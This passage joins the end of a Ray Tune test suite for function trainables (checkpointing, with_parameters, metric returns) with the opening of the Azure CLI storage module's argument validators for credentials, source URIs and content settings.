                if i == 5 and not restored:
                    raise Exception("try to fail me")
                with tune.checkpoint_dir(step=i) as checkpoint_dir:
                    checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log")
                    with open(checkpoint_path, "w") as f:
                        f.write(str(i))
                tune.report(test=i, training_iteration=i)
        analysis = tune.run(train, max_failures=3)
        last_ckpt = analysis.trials[0].checkpoint.value
        assert os.path.exists(os.path.join(last_ckpt, "ckpt.log"))
        trial_dfs = list(analysis.trial_dataframes.values())
        assert len(trial_dfs[0]["training_iteration"]) == 10
    def testEnabled(self):
        """tune.is_session_enabled() is False outside tune.run, True inside."""
        def train(config, checkpoint_dir=None):
            is_active = tune.is_session_enabled()
            result = {"active": is_active}
            if is_active:
                tune.report(**result)
            return result
        assert train({})["active"] is False
        analysis = tune.run(train)
        t = analysis.trials[0]
        assert t.last_result["active"], t.last_result
    def testBlankCheckpoint(self):
        """Retrying works when every save overwrites the same checkpoint step."""
        def train(config, checkpoint_dir=None):
            restored = bool(checkpoint_dir)
            itr = 0
            if checkpoint_dir:
                with open(os.path.join(checkpoint_dir, "ckpt.log"), "r") as f:
                    itr = int(f.read()) + 1
            for i in range(itr, 10):
                if i == 5 and not restored:
                    raise Exception("try to fail me")
                # NOTE(review): step=itr (fixed) rather than step=i -- this
                # overwrites one checkpoint dir on every save; looks deliberate
                # for this test but confirm.
                with tune.checkpoint_dir(step=itr) as checkpoint_dir:
                    checkpoint_path = os.path.join(checkpoint_dir, "ckpt.log")
                    with open(checkpoint_path, "w") as f:
                        f.write(str(i))
                tune.report(test=i, training_iteration=i)
        analysis = tune.run(train, max_failures=3)
        trial_dfs = list(analysis.trial_dataframes.values())
        assert len(trial_dfs[0]["training_iteration"]) == 10
    def testWithParameters(self):
        """with_parameters injects large objects; mutations stay trial-local."""
        class Data:
            def __init__(self):
                self.data = [0] * 500_000
        data = Data()
        data.data[100] = 1
        def train(config, data=None):
            data.data[101] = 2  # Changes are local
            tune.report(metric=len(data.data), hundred=data.data[100])
        trial_1, trial_2 = tune.run(
            with_parameters(train, data=data), num_samples=2
        ).trials
        # The driver-side copy must not see the trial-local mutation.
        self.assertEqual(data.data[101], 0)
        self.assertEqual(trial_1.last_result["metric"], 500_000)
        self.assertEqual(trial_1.last_result["hundred"], 1)
        self.assertEqual(trial_2.last_result["metric"], 500_000)
        self.assertEqual(trial_2.last_result["hundred"], 1)
        self.assertTrue(str(trial_1).startswith("train_"))
        # With checkpoint dir parameter
        def train(config, checkpoint_dir="DIR", data=None):
            data.data[101] = 2  # Changes are local
            tune.report(metric=len(data.data), cp=checkpoint_dir)
        trial_1, trial_2 = tune.run(
            with_parameters(train, data=data), num_samples=2
        ).trials
        self.assertEqual(data.data[101], 0)
        self.assertEqual(trial_1.last_result["metric"], 500_000)
        self.assertEqual(trial_1.last_result["cp"], "DIR")
        self.assertEqual(trial_2.last_result["metric"], 500_000)
        self.assertEqual(trial_2.last_result["cp"], "DIR")
        self.assertTrue(str(trial_1).startswith("train_"))
    def testWithParameters2(self):
        """Pickled with_parameters trainables stay small (data lives in the object store)."""
        class Data:
            def __init__(self):
                import numpy as np
                self.data = np.random.rand((2 * 1024 * 1024))
        def train(config, data=None):
            tune.report(metric=len(data.data))
        trainable = tune.with_parameters(train, data=Data())
        # ray.cloudpickle will crash for some reason
        import cloudpickle as cp
        dumped = cp.dumps(trainable)
        assert sys.getsizeof(dumped) < 100 * 1024
    def testNewResources(self):
        """ResourceChangingScheduler updates the resources a trial sees."""
        sched = ResourceChangingScheduler(
            resources_allocation_function=(
                lambda a, b, c, d: PlacementGroupFactory([{"CPU": 2}])
            )
        )
        def train(config, checkpoint_dir=None):
            tune.report(metric=1, resources=tune.get_trial_resources())
        analysis = tune.run(
            train,
            scheduler=sched,
            stop={"training_iteration": 2},
            resources_per_trial=PlacementGroupFactory([{"CPU": 1}]),
            num_samples=1,
        )
        results_list = list(analysis.results.values())
        # The scheduler bumped the trial from 1 CPU to 2.
        assert results_list[0]["resources"].head_cpus == 2.0
    def testWithParametersTwoRuns1(self):
        # Makes sure two runs in the same script but different ray sessions
        # pass (https://github.com/ray-project/ray/issues/16609)
        def train_fn(config, extra=4):
            tune.report(metric=extra)
        trainable = tune.with_parameters(train_fn, extra=8)
        out = tune.run(trainable, metric="metric", mode="max")
        self.assertEqual(out.best_result["metric"], 8)
        # Restart the ray session between the two runs.
        self.tearDown()
        self.setUp()
        def train_fn_2(config, extra=5):
            tune.report(metric=extra)
        trainable = tune.with_parameters(train_fn_2, extra=9)
        out = tune.run(trainable, metric="metric", mode="max")
        self.assertEqual(out.best_result["metric"], 9)
    def testWithParametersTwoRuns2(self):
        # Makes sure two runs in the same script
        # pass (https://github.com/ray-project/ray/issues/16609)
        def train_fn(config, extra=4):
            tune.report(metric=extra)
        def train_fn_2(config, extra=5):
            tune.report(metric=extra)
        trainable1 = tune.with_parameters(train_fn, extra=8)
        trainable2 = tune.with_parameters(train_fn_2, extra=9)
        out1 = tune.run(trainable1, metric="metric", mode="max")
        out2 = tune.run(trainable2, metric="metric", mode="max")
        self.assertEqual(out1.best_result["metric"], 8)
        self.assertEqual(out2.best_result["metric"], 9)
    def testReturnAnonymous(self):
        """A bare return value is recorded under the default metric key."""
        def train(config):
            return config["a"]
        trial_1, trial_2 = tune.run(
            train, config={"a": tune.grid_search([4, 8])}
        ).trials
        self.assertEqual(trial_1.last_result[DEFAULT_METRIC], 4)
        self.assertEqual(trial_2.last_result[DEFAULT_METRIC], 8)
    def testReturnSpecific(self):
        """A returned dict is recorded under its own keys."""
        def train(config):
            return {"m": config["a"]}
        trial_1, trial_2 = tune.run(
            train, config={"a": tune.grid_search([4, 8])}
        ).trials
        self.assertEqual(trial_1.last_result["m"], 4)
        self.assertEqual(trial_2.last_result["m"], 8)
    def testYieldAnonymous(self):
        """Yielded bare values are recorded under the default metric key."""
        def train(config):
            for i in range(10):
                yield config["a"] + i
        trial_1, trial_2 = tune.run(
            train, config={"a": tune.grid_search([4, 8])}
        ).trials
        self.assertEqual(trial_1.last_result[DEFAULT_METRIC], 4 + 9)
        self.assertEqual(trial_2.last_result[DEFAULT_METRIC], 8 + 9)
    def testYieldSpecific(self):
        """Yielded dicts are recorded under their own keys."""
        def train(config):
            for i in range(10):
                yield {"m": config["a"] + i}
        trial_1, trial_2 = tune.run(
            train, config={"a": tune.grid_search([4, 8])}
        ).trials
        self.assertEqual(trial_1.last_result["m"], 4 + 9)
        self.assertEqual(trial_2.last_result["m"], 8 + 9)
if __name__ == "__main__":
    import pytest
    # Run this file's tests directly, exiting with pytest's status code.
    sys.exit(pytest.main(["-v", __file__]))
|
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=protected-access
import argparse
from azure.cli.core.commands.validators import validate_key_value_pairs
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.command_modules.storage._client_factory import (get_storage_data_service_client,
blob_data_service_factory,
file_data_service_factory,
storage_client_factory)
from azure.cli.command_modules.storage.util import glob_files_locally, guess_content_type
from azure.cli.command_modules.storage.sdkutil import get_table_data_type
from azure.cli.command_modules.storage.url_quote_util import encode_for_url
from azure.cli.command_modules.storage.oauth_token_util import TokenUpdater
from knack.log import get_logger
from knack.util import CLIError
storage_account_key_options = {'primary': 'key1', 'secondary': 'key2'}
logger = get_logger(__name__)
# Utilities
# pylint: disable=inconsistent-return-statements,too-many-lines
def _query_account_key(cli_ctx, account_name):
    """Query the storage account key. This is used when the customer doesn't offer account key but name."""
    # list_keys requires the resource group, so resolve it first.
    rg, scf = _query_account_rg(cli_ctx, account_name)
    # Older mgmt SDK profiles expose StorageAccountKeys (with .key1/.key2);
    # newer profiles return a StorageAccountListKeysResult with a .keys list.
    t_storage_account_keys = get_sdk(
        cli_ctx, ResourceType.MGMT_STORAGE, 'models.storage_account_keys#StorageAccountKeys')
    # logging_enable=False below keeps the account keys out of debug logs.
    logger.debug('Disable HTTP logging to avoid having storage keys in debug logs')
    if t_storage_account_keys:
        return scf.storage_accounts.list_keys(rg, account_name, logging_enable=False).key1
    # of type: models.storage_account_list_keys_result#StorageAccountListKeysResult
    return scf.storage_accounts.list_keys(rg, account_name, logging_enable=False).keys[0].value # pylint: disable=no-member
def _query_account_rg(cli_ctx, account_name):
    """Query the storage account's resource group, which the mgmt sdk requires.

    Returns a (resource_group_name, storage_client) tuple, or raises
    ValueError when no account with the given name is visible.
    """
    scf = storage_client_factory(cli_ctx)
    for account in scf.storage_accounts.list():
        if account.name == account_name:
            from msrestazure.tools import parse_resource_id
            # The account's ARM id carries the resource group segment.
            return parse_resource_id(account.id)['resource_group'], scf
    raise ValueError("Storage account '{}' not found.".format(account_name))
def _create_token_credential(cli_ctx):
    """Create a data-plane TokenCredential whose token is kept fresh by a
    TokenUpdater; the updater's timer is cancelled once the command finishes.
    """
    from knack.cli import EVENT_CLI_POST_EXECUTE
    TokenCredential = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#TokenCredential')
    token_credential = TokenCredential()
    # The updater refreshes token_credential in the background.
    updater = TokenUpdater(token_credential, cli_ctx)
    def _cancel_timer_event_handler(_, **__):
        updater.cancel()
    # Stop the refresh timer after the command executes.
    cli_ctx.register_event(EVENT_CLI_POST_EXECUTE, _cancel_timer_event_handler)
    return token_credential
# region PARAMETER VALIDATORS
def parse_storage_account(cmd, namespace):
    """Parse storage account which can be either account name or account id.

    When an ARM resource id is supplied, extract both the account name and
    the resource group from it.  When a bare name is supplied without a
    resource group, look the group up via the management SDK.
    """
    from msrestazure.tools import parse_resource_id, is_valid_resource_id
    if namespace.account_name and is_valid_resource_id(namespace.account_name):
        # Parse the id once instead of twice; it carries both values we need.
        id_parts = parse_resource_id(namespace.account_name)
        namespace.resource_group_name = id_parts['resource_group']
        namespace.account_name = id_parts['name']
    elif namespace.account_name and not namespace.resource_group_name:
        # Reaching this branch implies the account name is not a resource id
        # (the first condition already ruled that in), so no re-check needed.
        namespace.resource_group_name = _query_account_rg(cmd.cli_ctx, namespace.account_name)[0]
def process_resource_group(cmd, namespace):
    """Processes the resource group parameter from the account name"""
    # Nothing to do unless an account name was given without a group.
    if not namespace.account_name or namespace.resource_group_name:
        return
    namespace.resource_group_name = _query_account_rg(cmd.cli_ctx, namespace.account_name)[0]
def validate_table_payload_format(cmd, namespace):
    """Map the user-facing --accept value onto the SDK's TablePayloadFormat enum."""
    t_table_payload = get_table_data_type(cmd.cli_ctx, 'table', 'TablePayloadFormat')
    if not namespace.accept:
        return
    payload_formats = {
        'none': t_table_payload.JSON_NO_METADATA,
        'minimal': t_table_payload.JSON_MINIMAL_METADATA,
        'full': t_table_payload.JSON_FULL_METADATA,
    }
    namespace.accept = payload_formats[namespace.accept.lower()]
def validate_bypass(namespace):
    """Collapse a list of network-rule bypass values into one comma-separated string."""
    bypass = namespace.bypass
    if not bypass:
        return
    if isinstance(bypass, list):
        namespace.bypass = ', '.join(bypass)
def get_config_value(cmd, section, key, default):
    """Read `key` from `section` of the CLI configuration, returning `default` when absent."""
    return cmd.cli_ctx.config.get(section, key, default)
def is_storagev2(import_prefix):
    """Return True when the SDK import prefix belongs to the track2 (storagev2) multiapi package."""
    return import_prefix.startswith('azure.multiapi.storagev2.')
def validate_client_parameters(cmd, namespace):
    """Retrieve storage connection parameters from config/environment variables and parse
    the connection string into account name and key.

    Resolution order: explicit arguments, `az configure` defaults, the connection
    string, then (as a last resort) a management-plane query for the account key.
    When ``--auth-mode login`` is in effect a token credential is attached instead
    and any key/SAS/connection-string arguments are ignored with a warning.
    """
    n = namespace

    if hasattr(n, 'auth_mode'):
        auth_mode = n.auth_mode or get_config_value(cmd, 'storage', 'auth_mode', None)
        del n.auth_mode
        if not n.account_name:
            n.account_name = get_config_value(cmd, 'storage', 'account', None)
        if auth_mode == 'login':
            prefix = cmd.command_kwargs['resource_type'].value[0]
            # is_storagev2() is used to distinguish if the command is in track2 SDK
            # If yes, we will use get_login_credentials() as token credential
            if is_storagev2(prefix):
                from azure.cli.core._profile import Profile
                profile = Profile(cli_ctx=cmd.cli_ctx)
                n.token_credential, _, _ = profile.get_login_credentials(subscription_id=n._subscription)
            # Otherwise, we will assume it is in track1 and keep previous token updater
            else:
                n.token_credential = _create_token_credential(cmd.cli_ctx)

    if hasattr(n, 'token_credential') and n.token_credential:
        # give warning if there are account key args being ignored
        account_key_args = [n.account_key and "--account-key", n.sas_token and "--sas-token",
                            n.connection_string and "--connection-string"]
        account_key_args = [arg for arg in account_key_args if arg]

        if account_key_args:
            # BUGFIX: separator was ' ,' (space before comma), producing e.g.
            # "--account-key ,--sas-token" in the warning text.
            logger.warning('In "login" auth mode, the following arguments are ignored: %s',
                           ', '.join(account_key_args))
        return

    if not n.connection_string:
        n.connection_string = get_config_value(cmd, 'storage', 'connection_string', None)

    # if connection string supplied or in environment variables, extract account key and name
    if n.connection_string:
        conn_dict = validate_key_value_pairs(n.connection_string)
        n.account_name = conn_dict.get('AccountName')
        n.account_key = conn_dict.get('AccountKey')
        n.sas_token = conn_dict.get('SharedAccessSignature')

    # otherwise, simply try to retrieve the remaining variables from environment variables
    if not n.account_name:
        n.account_name = get_config_value(cmd, 'storage', 'account', None)
    if not n.account_key:
        n.account_key = get_config_value(cmd, 'storage', 'key', None)
    if not n.sas_token:
        n.sas_token = get_config_value(cmd, 'storage', 'sas_token', None)

    # strip the '?' from the sas token; the portal and the command line return
    # sas tokens in different forms
    if n.sas_token:
        n.sas_token = n.sas_token.lstrip('?')

    # if account name is specified but no key, attempt to query
    if n.account_name and not n.account_key and not n.sas_token:
        logger.warning('There are no credentials provided in your command and environment, we will query for the '
                       'account key inside your storage account. \nPlease provide --connection-string, '
                       '--account-key or --sas-token as credentials, or use `--auth-mode login` if you '
                       'have required RBAC roles in your command. For more information about RBAC roles '
                       'in storage, visit '
                       'https://docs.microsoft.com/azure/storage/common/storage-auth-aad-rbac-cli. \n'
                       'Setting the corresponding environment variables can avoid inputting credentials in '
                       'your command. Please use --help to get more information.')
        n.account_key = _query_account_key(cmd.cli_ctx, n.account_name)
def validate_encryption_key(cmd, namespace):
    """Cross-validate --key-source and --key-uri for encryption-scope commands."""
    source_enum = cmd.get_models('EncryptionScopeSource', resource_type=ResourceType.MGMT_STORAGE)
    uses_key_vault = namespace.key_source == source_enum.microsoft_key_vault
    # key vault source requires a key URI ...
    if uses_key_vault and not namespace.key_uri:
        raise CLIError("usage error: Please specify --key-uri when using {} as key source."
                       .format(source_enum.microsoft_key_vault))
    # ... and a key URI is meaningless with any other source
    if namespace.key_uri and not uses_key_vault:
        raise CLIError("usage error: Specify `--key-source={}` and --key-uri to configure key vault properties."
                       .format(source_enum.microsoft_key_vault))
def process_blob_source_uri(cmd, namespace):
    """
    Validate the parameters referenced to a blob source and create the source URI from them.

    Either --source-uri alone, or the container/blob/snapshot triple (optionally with
    source account credentials), may be supplied. When no SAS is available, a short-lived
    one is generated from the resolved source account key. The result is stored in
    namespace.copy_source; the individual source_* arguments are consumed (popped).
    """
    from .util import create_short_lived_blob_sas
    usage_string = \
        'Invalid usage: {}. Supply only one of the following argument sets to specify source:' \
        '\n\t --source-uri' \
        '\n\tOR --source-container --source-blob --source-snapshot [--source-account-name & sas] ' \
        '\n\tOR --source-container --source-blob --source-snapshot [--source-account-name & key] '
    ns = vars(namespace)
    # source as blob
    container = ns.pop('source_container', None)
    blob = ns.pop('source_blob', None)
    snapshot = ns.pop('source_snapshot', None)
    # source credential clues
    source_account_name = ns.pop('source_account_name', None)
    source_account_key = ns.pop('source_account_key', None)
    sas = ns.pop('source_sas', None)
    # source in the form of an uri
    uri = ns.get('copy_source', None)
    if uri:
        if any([container, blob, sas, snapshot, source_account_name, source_account_key]):
            raise ValueError(usage_string.format('Unused parameters are given in addition to the '
                                                 'source URI'))
        # simplest scenario--no further processing necessary
        return
    validate_client_parameters(cmd, namespace)  # must run first to resolve storage account
    # determine if the copy will happen in the same storage account
    if not source_account_name and source_account_key:
        raise ValueError(usage_string.format('Source account key is given but account name is not'))
    if not source_account_name and not source_account_key:
        # neither source account name or key is given, assume that user intends to copy blob in
        # the same account
        source_account_name = ns.get('account_name', None)
        source_account_key = ns.get('account_key', None)
    elif source_account_name and not source_account_key:
        if source_account_name == ns.get('account_name', None):
            # the source account name is same as the destination account name
            source_account_key = ns.get('account_key', None)
        else:
            # the source account is different from destination account but the key is missing
            # try to query one.
            try:
                source_account_key = _query_account_key(cmd.cli_ctx, source_account_name)
            except ValueError:
                raise ValueError('Source storage account {} not found.'.format(source_account_name))
    # else: both source account name and key are given by user
    if not source_account_name:
        raise ValueError(usage_string.format('Storage account name not found'))
    if not sas:
        # no SAS supplied: mint a short-lived one from the resolved key
        sas = create_short_lived_blob_sas(cmd, source_account_name, source_account_key, container, blob)
    query_params = []
    if sas:
        query_params.append(sas)
    if snapshot:
        query_params.append('snapshot={}'.format(snapshot))
    uri = 'https://{}.blob.{}/{}/{}{}{}'.format(source_account_name,
                                                cmd.cli_ctx.cloud.suffixes.storage_endpoint,
                                                container,
                                                blob,
                                                '?' if query_params else '',
                                                '&'.join(query_params))
    namespace.copy_source = uri
def validate_source_uri(cmd, namespace):  # pylint: disable=too-many-statements
    """Build namespace.copy_source from either --source-uri or blob/file source arguments.

    Exactly one of a blob source (container+blob), a file source (share+path), or a
    pre-built URI must be given. Source credentials are resolved from the arguments,
    the destination account, or a management-plane key query; a short-lived SAS is
    generated when needed. Consumes (pops) the individual source_* arguments.
    """
    from .util import create_short_lived_blob_sas, create_short_lived_file_sas
    usage_string = \
        'Invalid usage: {}. Supply only one of the following argument sets to specify source:' \
        '\n\t --source-uri [--source-sas]' \
        '\n\tOR --source-container --source-blob [--source-account-name & sas] [--source-snapshot]' \
        '\n\tOR --source-container --source-blob [--source-account-name & key] [--source-snapshot]' \
        '\n\tOR --source-share --source-path' \
        '\n\tOR --source-share --source-path [--source-account-name & sas]' \
        '\n\tOR --source-share --source-path [--source-account-name & key]'
    ns = vars(namespace)
    # source as blob
    container = ns.pop('source_container', None)
    blob = ns.pop('source_blob', None)
    snapshot = ns.pop('source_snapshot', None)
    # source as file
    share = ns.pop('source_share', None)
    path = ns.pop('source_path', None)
    file_snapshot = ns.pop('file_snapshot', None)
    # source credential clues
    source_account_name = ns.pop('source_account_name', None)
    source_account_key = ns.pop('source_account_key', None)
    source_sas = ns.pop('source_sas', None)
    # source in the form of an uri
    uri = ns.get('copy_source', None)
    if uri:
        if any([container, blob, snapshot, share, path, file_snapshot, source_account_name,
                source_account_key]):
            raise ValueError(usage_string.format('Unused parameters are given in addition to the '
                                                 'source URI'))
        if source_sas:
            source_sas = source_sas.lstrip('?')
            uri = '{}{}{}'.format(uri, '?', source_sas)
        namespace.copy_source = uri
        return
    # ensure either a file or blob source is specified
    valid_blob_source = container and blob and not share and not path and not file_snapshot
    valid_file_source = share and path and not container and not blob and not snapshot
    if not valid_blob_source and not valid_file_source:
        raise ValueError(usage_string.format('Neither a valid blob or file source is specified'))
    if valid_blob_source and valid_file_source:
        raise ValueError(usage_string.format('Ambiguous parameters, both blob and file sources are '
                                             'specified'))
    validate_client_parameters(cmd, namespace)  # must run first to resolve storage account
    if not source_account_name:
        if source_account_key:
            raise ValueError(usage_string.format('Source account key is given but account name is not'))
        # assume that user intends to copy blob in the same account
        source_account_name = ns.get('account_name', None)
    # determine if the copy will happen in the same storage account
    same_account = False
    if not source_account_key and not source_sas:
        if source_account_name == ns.get('account_name', None):
            same_account = True
            source_account_key = ns.get('account_key', None)
            source_sas = ns.get('sas_token', None)
        else:
            # the source account is different from destination account but the key is missing try to query one.
            try:
                source_account_key = _query_account_key(cmd.cli_ctx, source_account_name)
            except ValueError:
                raise ValueError('Source storage account {} not found.'.format(source_account_name))
    # Both source account name and either key or sas (or both) are now available
    if not source_sas:
        # generate a sas token even in the same account when the source and destination are not the same kind.
        if valid_file_source and (ns.get('container_name', None) or not same_account):
            import os
            dir_name, file_name = os.path.split(path) if path else (None, '')
            source_sas = create_short_lived_file_sas(cmd, source_account_name, source_account_key, share,
                                                     dir_name, file_name)
        elif valid_blob_source and (ns.get('share_name', None) or not same_account):
            source_sas = create_short_lived_blob_sas(cmd, source_account_name, source_account_key, container, blob)
    query_params = []
    if source_sas:
        query_params.append(source_sas.lstrip('?'))
    if snapshot:
        query_params.append('snapshot={}'.format(snapshot))
    if file_snapshot:
        query_params.append('sharesnapshot={}'.format(file_snapshot))
    # endpoint kind ('blob' vs 'file') and the container/share segment both
    # depend on which source flavor was validated above
    uri = 'https://{0}.{1}.{6}/{2}/{3}{4}{5}'.format(
        source_account_name,
        'blob' if valid_blob_source else 'file',
        container if valid_blob_source else share,
        encode_for_url(blob if valid_blob_source else path),
        '?' if query_params else '',
        '&'.join(query_params),
        cmd.cli_ctx.cloud.suffixes.storage_endpoint)
    namespace.copy_source = uri
def validate_blob_type(namespace):
    """Default the blob type: .vhd uploads become page blobs, everything else block blobs."""
    if namespace.blob_type:
        return
    is_vhd = namespace.file_path.endswith('.vhd')
    namespace.blob_type = 'page' if is_vhd else 'block'
def validate_storage_data_plane_list(namespace):
    """Translate '*' (return everything) to None; otherwise coerce --num-results to int."""
    raw = namespace.num_results
    namespace.num_results = None if raw == '*' else int(raw)
def get_content_setting_validator(settings_class, update, guess_from_file=None):
    """Create a validator that assembles a ContentSettings object into ns['content_settings'].

    For updates (update=True) the existing properties are fetched from the service so
    that unspecified values are preserved, unless --clear-content-settings was given.
    guess_from_file names another namespace argument whose filename is used to guess
    the content type for uploads.
    """
    # NOTE(review): for a class object, __class__.__name__ is the metaclass name
    # (usually 'type'), so this effectively compares by module path only — it works
    # because blob and file ContentSettings live in different modules. Confirm before
    # reusing elsewhere.
    def _class_name(class_type):
        return class_type.__module__ + "." + class_type.__class__.__name__
    def validator(cmd, namespace):
        t_base_blob_service, t_file_service, t_blob_content_settings, t_file_content_settings = cmd.get_models(
            'blob.baseblobservice#BaseBlobService',
            'file#FileService',
            'blob.models#ContentSettings',
            'file.models#ContentSettings')
        # must run certain validators first for an update
        if update:
            validate_client_parameters(cmd, namespace)
        if update and _class_name(settings_class) == _class_name(t_file_content_settings):
            get_file_path_validator()(namespace)
        ns = vars(namespace)
        clear_content_settings = ns.pop('clear_content_settings', False)
        # retrieve the existing object properties for an update
        if update and not clear_content_settings:
            account = ns.get('account_name')
            key = ns.get('account_key')
            cs = ns.get('connection_string')
            sas = ns.get('sas_token')
            token_credential = ns.get('token_credential')
            if _class_name(settings_class) == _class_name(t_blob_content_settings):
                client = get_storage_data_service_client(cmd.cli_ctx,
                                                         service=t_base_blob_service,
                                                         name=account,
                                                         key=key, connection_string=cs, sas_token=sas,
                                                         token_credential=token_credential)
                container = ns.get('container_name')
                blob = ns.get('blob_name')
                lease_id = ns.get('lease_id')
                props = client.get_blob_properties(container, blob, lease_id=lease_id).properties.content_settings
            elif _class_name(settings_class) == _class_name(t_file_content_settings):
                client = get_storage_data_service_client(cmd.cli_ctx, t_file_service, account, key, cs, sas)
                share = ns.get('share_name')
                directory = ns.get('directory_name')
                filename = ns.get('file_name')
                props = client.get_file_properties(share, directory, filename).properties.content_settings
        # create new properties
        new_props = settings_class(
            content_type=ns.pop('content_type', None),
            content_disposition=ns.pop('content_disposition', None),
            content_encoding=ns.pop('content_encoding', None),
            content_language=ns.pop('content_language', None),
            content_md5=ns.pop('content_md5', None),
            cache_control=ns.pop('content_cache_control', None)
        )
        # if update, fill in any None values with existing
        if update:
            if not clear_content_settings:
                for attr in ['content_type', 'content_disposition', 'content_encoding', 'content_language',
                             'content_md5', 'cache_control']:
                    if getattr(new_props, attr) is None:
                        setattr(new_props, attr, getattr(props, attr))
        else:
            if guess_from_file:
                new_props = guess_content_type(ns[guess_from_file], new_props, settings_class)
        ns['content_settings'] = new_props
    return validator
def validate_custom_domain(namespace):
    """Reject --use-subdomain unless a custom domain was also supplied."""
    subdomain_without_domain = bool(namespace.use_subdomain) and not namespace.custom_domain
    if subdomain_without_domain:
        raise ValueError('usage error: --custom-domain DOMAIN [--use-subdomain]')
def validate_encryption_services(cmd, namespace):
    """
    Builds up the encryption services object for storage account operations based on the list of services passed in.
    """
    if not namespace.encryption_services:
        return
    t_services, t_service = get_sdk(cmd.cli_ctx, ResourceType.MGMT_STORAGE,
                                    'EncryptionServices', 'EncryptionService', mod='models')
    # every named service is switched on; unnamed ones are left to their defaults
    enabled = {name: t_service(enabled=True) for name in namespace.encryption_services}
    namespace.encryption_services = t_services(**enabled)
def validate_encryption_source(namespace):
    """Check that key vault parameters appear only with --encryption-key-source=Microsoft.Keyvault."""
    source = namespace.encryption_key_source
    have_vault_args = bool(namespace.encryption_key_name) or \
        namespace.encryption_key_version is not None or bool(namespace.encryption_key_vault)
    # key vault as source requires both the key name and the vault URI
    if source == 'Microsoft.Keyvault' and \
            not (namespace.encryption_key_name and namespace.encryption_key_vault):
        raise ValueError('--encryption-key-name and --encryption-key-vault are required '
                         'when --encryption-key-source=Microsoft.Keyvault is specified.')
    # vault arguments make no sense with any other (explicit) source
    if have_vault_args and source and source != 'Microsoft.Keyvault':
        raise ValueError('--encryption-key-name, --encryption-key-vault, and --encryption-key-version are not '
                         'applicable without Microsoft.Keyvault key-source.')
def validate_entity(namespace):
    """ Converts a list of key value pairs into a dictionary. Ensures that required
    RowKey and PartitionKey are converted to the correct case and included. """
    values = dict(pair.split('=', 1) for pair in namespace.entity)

    # canonicalize the casing of the two mandatory table keys
    for original_key in list(values.keys()):
        lowered = original_key.lower()
        if lowered in ('rowkey', 'partitionkey'):
            canonical = 'RowKey' if lowered == 'rowkey' else 'PartitionKey'
            values[canonical] = values.pop(original_key)

    present = values.keys()
    missing = 'RowKey ' if 'RowKey' not in present else ''
    if 'PartitionKey' not in present:
        missing = '{}PartitionKey'.format(missing)
    if missing:
        raise argparse.ArgumentError(
            None, 'incorrect usage: entity requires: {}'.format(missing))

    def cast_val(key, val):
        """ Attempts to cast numeric values (except RowKey and PartitionKey) to numbers so they
        can be queried correctly. """
        if key in ('PartitionKey', 'RowKey'):
            return val

        def try_cast(to_type):
            try:
                return to_type(val)
            except ValueError:
                return None
        # NOTE: the or-chain means falsy casts (0, 0.0) fall through to the raw string
        return try_cast(int) or try_cast(float) or val

    # ensure numbers are converted from strings so querying will work correctly
    namespace.entity = {key: cast_val(key, val) for key, val in values.items()}
def validate_marker(namespace):
    """ Converts a list of key value pairs into a dictionary. Ensures that required
    nextrowkey and nextpartitionkey are included. """
    if not namespace.marker:
        return
    marker = dict(pair.split('=', 1) for pair in namespace.marker)
    required = {'nextrowkey', 'nextpartitionkey'}
    # lowercase the required keys in place, ticking them off as they are found
    for original_key in list(marker):
        lowered = original_key.lower()
        if lowered in required:
            required.remove(lowered)
            marker[lowered] = marker.pop(original_key)
    if required:
        raise argparse.ArgumentError(
            None, 'incorrect usage: marker requires: {}'.format(' '.join(required)))
    namespace.marker = marker
def get_file_path_validator(default_file_param=None):
    """ Creates a namespace validator that splits out 'path' into 'directory_name' and 'file_name'.
    Allows another path-type parameter to be named which can supply a default filename. """
    def validator(namespace):
        import os
        if not hasattr(namespace, 'path'):
            return
        path = namespace.path
        if path:
            dir_part, file_part = os.path.split(path)
        else:
            dir_part, file_part = None, ''
        if default_file_param and '.' not in file_part:
            # no filename in the path: treat the whole path as a directory and
            # borrow the filename from the fallback parameter
            dir_part = path
            file_part = os.path.split(getattr(namespace, default_file_param))[1]
        namespace.directory_name = dir_part if dir_part not in ('', '.') else None
        namespace.file_name = file_part
        del namespace.path
    return validator
def validate_included_datasets(cmd, namespace):
    """Expand the --include flag string (a subset of 'cmsd') into a blob Include object."""
    include = namespace.include
    if not include:
        return
    if set(include) - set('cmsd'):
        help_string = '(c)opy-info (m)etadata (s)napshots (d)eleted'
        raise ValueError('valid values are {} or a combination thereof.'.format(help_string))
    t_blob_include = cmd.get_models('blob#Include')
    # positional args: snapshots, metadata, uncommitted_blobs(False), copy, deleted
    namespace.include = t_blob_include('s' in include, 'm' in include, False, 'c' in include, 'd' in include)
def validate_key_name(namespace):
    """Resolve --key {primary,secondary} (optionally qualified by --key-type) to the API key name."""
    suffix_by_name = {'primary': '1', 'secondary': '2'}
    key_type = getattr(namespace, 'key_type', None)
    if key_type:
        # e.g. key_type 'kerb' + key_name 'primary' -> 'kerb1'
        namespace.key_name = key_type + suffix_by_name[namespace.key_name]
    else:
        namespace.key_name = storage_account_key_options[namespace.key_name]
    if hasattr(namespace, 'key_type'):
        del namespace.key_type
def validate_metadata(namespace):
    """Turn repeated 'key=value' metadata arguments into a dict (values may contain '=')."""
    if namespace.metadata:
        pairs = (item.split('=', 1) for item in namespace.metadata)
        namespace.metadata = dict(pairs)
def get_permission_help_string(permission_class):
    """Render e.g. '(r)ead (w)rite' from the public attribute names of a permission class."""
    names = [attr.lower() for attr in dir(permission_class) if not attr.startswith('__')]
    return ' '.join('({}){}'.format(name[0], name[1:]) for name in names)
def get_permission_validator(permission_class):
    """Build a validator that checks the permission string's characters against
    *permission_class* and replaces it with an instance of that class."""
    permission_names = [attr.lower() for attr in dir(permission_class) if not attr.startswith('__')]
    # legal characters are the first letter of each permission name
    legal_chars = set(name[0] for name in permission_names)

    def validator(namespace):
        if not namespace.permission:
            return
        if set(namespace.permission) - legal_chars:
            raise ValueError(
                'valid values are {} or a combination thereof.'.format(
                    get_permission_help_string(permission_class)))
        namespace.permission = permission_class(_str=namespace.permission)
    return validator
def table_permission_validator(cmd, namespace):
    """ A special case for table because the SDK associates the QUERY permission with 'r' """
    t_table_permissions = get_table_data_type(cmd.cli_ctx, 'table', 'TablePermissions')
    if not namespace.permission:
        return
